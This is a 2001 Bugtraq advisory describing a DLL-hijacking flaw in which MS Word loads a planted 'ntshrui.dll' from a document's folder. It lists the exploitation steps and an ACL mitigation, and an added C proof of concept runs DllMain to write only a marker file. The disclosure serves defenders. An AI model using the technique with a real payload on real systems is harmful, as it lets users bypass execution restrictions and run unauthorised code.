Bugtraq mailing list archives

MSword execution of dlls


From: Anders Ingeborn <ingeborn () IXSECURITY COM>
Date: Thu, 22 Feb 2001 11:11:38 +0100

Hi,
while testing the riched20.dll vulnerability (bid/1699) for a client we noticed that it is also
possible to make MS Word execute the DllMain() function from the file "ntshrui.dll".

Impact: If users on a terminal server system are restricted from running executables in terms
of .exe files but allowed to open Word documents, this feature can be used to run code.

Details: It can be exploited as:
(1) Write a program with main function DllMain() and compile it as a .dll that you give the
name "ntshrui.dll".
(2) Put your .dll in the same directory as a Word document.
(3) Close all Office applications.
(4) Double-click on the Word document.
(5) When MS Word initializes it will use your ntshrui.dll instead of the one in
%systemroot% and your code will be executed.

** I do not take credit for finding this vulnerability in Word, that goes to Georgi Guninski.
This is just an update regarding the name of the "malicious" .dll file that one could use.
More info can be found on Georgi's website http://www.guninski.com **

Solution: We have discussed this with MS support (2001-01-29) and according to them this
should be handled/prevented by setting access control lists so that users are given read-only
rights and restricted from running applications in the directory where the document and .dll
are stored.

Regards,
Anders Ingeborn
iXsecurity, Stockholm 2001
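Editor's added example, not part of Anders Ingeborn's post: a minimal proof-of-concept library of the kind step (1) describes. Compiled as ntshrui.dll and placed next to a .doc file, its DllMain runs when Word picks it up from the document's directory instead of %systemroot%\system32. The build command (MinGW cross-compiler), the marker file path C:\Temp\hijack_marker.txt and the helper names record_execution() and count_recorded_executions() are this example's assumptions; the post only states that DllMain is executed. The payload deliberately does nothing beyond writing proof of execution, so the file's contents show which process loaded the DLL.

```c
/*
 * Added example (not from the original Bugtraq post): proof-of-concept
 * "ntshrui.dll" whose DllMain records that it was loaded by the host process.
 *
 * Build on Windows with MinGW (assumed toolchain):
 *   x86_64-w64-mingw32-gcc -shared -o ntshrui.dll ntshrui.c
 * then copy ntshrui.dll next to a .doc file, close all Office applications
 * and double-click the document, as in steps (2)-(4) of the post.
 *
 * The marker file location is this example's choice, not the post's.
 */
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Portable payload: append one timestamped line to marker_path recording
 * that the DLL entry point ran inside host_desc. Returns 1 on success,
 * 0 if the marker file could not be written. */
int record_execution(const char *marker_path, const char *host_desc)
{
    FILE *f = fopen(marker_path, "a");
    if (!f)
        return 0;

    char stamp[32];
    time_t now = time(NULL);
    struct tm *utc = gmtime(&now);
    if (!utc || !strftime(stamp, sizeof stamp, "%Y-%m-%dT%H:%M:%SZ", utc))
        strcpy(stamp, "unknown-time");

    int ok = fprintf(f, "%s DllMain ran in %s\n", stamp, host_desc) > 0;
    if (fclose(f) != 0)
        ok = 0;
    return ok;
}

/* Read the marker file back and count recorded executions; returns -1 if
 * the file cannot be opened (i.e. the DLL was never loaded). */
int count_recorded_executions(const char *marker_path)
{
    FILE *f = fopen(marker_path, "r");
    if (!f)
        return -1;

    int count = 0;
    char line[256];
    while (fgets(line, sizeof line, f))
        if (strstr(line, "DllMain ran in"))
            count++;
    fclose(f);
    return count;
}

#ifdef _WIN32
#include <windows.h>

/* Entry point the Windows loader calls on load/unload. Only the process
 * attach case is acted on; work here is kept minimal because the loader
 * lock is held while DllMain runs. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;
    if (fdwReason == DLL_PROCESS_ATTACH) {
        /* Full path of the executable that loaded us, e.g. ...\WINWORD.EXE */
        char host[MAX_PATH] = "unknown host";
        GetModuleFileNameA(NULL, host, sizeof host);
        record_execution("C:\\Temp\\hijack_marker.txt", host); /* assumed path */
    }
    return TRUE;
}
#endif
```

After opening the document, a line such as "... DllMain ran in C:\Program Files\Microsoft Office\Office\WINWORD.EXE" in the marker file confirms that Word resolved ntshrui.dll from the document's directory rather than from the system directory, which is exactly the condition the ACL advice in the Solution paragraph is meant to prevent: if users cannot write to the directory holding the document, they cannot plant the DLL there.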

